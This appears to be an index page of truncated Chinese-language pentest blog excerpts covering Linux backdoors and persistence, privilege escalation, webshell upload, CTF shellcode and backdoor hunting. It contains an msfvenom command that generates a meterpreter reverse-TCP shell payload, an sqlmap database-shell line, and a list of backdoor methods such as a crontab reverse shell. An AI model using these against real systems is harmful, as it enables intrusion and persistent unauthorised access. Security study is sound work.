在一次滲透中，成功獲取某目標幾台比較重要的機器，當時只想着獲取脫庫，結果動靜太大被發現了，之前滲透並沒太在意Linux維持權限，經過此次事后從Google找各種資料，一款滿意的rootkit都沒有，現在一直在關注這方面，但還是沒有找到滿意的后門，在滲透圈一個人的資源總是有限往往你全力追求 ...

在滲透測試過程中，提升權限是非常關鍵的一步，攻擊者往往可以通過利用內核漏洞/權限配置不當/root權限運行的服務等方式尋找突破點，來達到提升權限的目的。 1、內核漏洞提權 提起內核漏洞提 ...

目錄 ssh軟連接 添加用戶 修改/etc/sudoers文件 suid后門 crontab反彈shell后門 ssh免密登錄 ssh wrapper后門 inetd strace后門 協議后門 icmp ...

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=port -f elf > shell.elf ...

配置文件排查： 　　文件屬性：stat /etc/rc.local 　　文件配置：cat /etc/fstab 　　文件內容：grep -V '#' /etc/bashrc | more 　　文件目錄：ls -last /etc/profile.d/ cron后門排查： 　　配置文件 ...

記錄一下文件上傳的常見姿勢，更全面的可以做upload-labs。 實驗環境：win2003 phpstudy 實驗平台：upfile 一、准備上傳的一句話木馬 eval函數將接受的字符串當做代碼執行 二、實驗步驟 2.1 無防護上傳 可以直接上傳一句話木馬 ...

今天開始在做hitcon-training的題目，做到lab2就發現了自己的知識盲區，遇到無法執行shell的情況，需要自己打shellcode執行cat flag 操作 經過一系列的搜索，發現了幾種編寫shellcode的方法 ...

windows提權 1.通過sqlmap連接mysql獲取shell （1）直接連接數據庫 sqlmap.py -d “mysql://root:123456@127.0.0.1:3306/my ...